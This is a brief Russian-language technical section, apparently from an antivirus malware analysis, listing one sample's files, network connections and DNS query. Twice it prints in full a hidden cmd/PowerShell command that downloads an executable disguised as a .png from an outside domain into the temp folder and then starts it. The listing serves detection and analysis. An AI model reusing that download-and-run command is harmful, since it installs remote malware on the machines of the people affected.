Техническая информация
- http://benwellgroup.co.uk/60892eb296e937266bf9f3e38f2c5a.png как %temp%\fxgkexr.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://benwellgroup.co.uk/60892eb296e937266bf9f3e38f2c5a.png','%TMP%\fxgkexr.exe');Start-Process '%TMP%\fxgkexr.exe';
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1404
- %TEMP%\705046.cvr
- %TEMP%\fxgkexr.exe
- 'be####lgroup.co.uk':80
- http://be####lgroup.co.uk/60892eb296e937266bf9f3e38f2c5a.png
- '34.##9.100.209':443
- DNS ASK be####lgroup.co.uk
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://benwellgroup.co.uk/60892eb296e937266bf9f3e38f2c5a.png','%TMP%\fxgkexr.exe');Start-Process '%TMP%\fxgkexr.exe'; (со скрытым окном)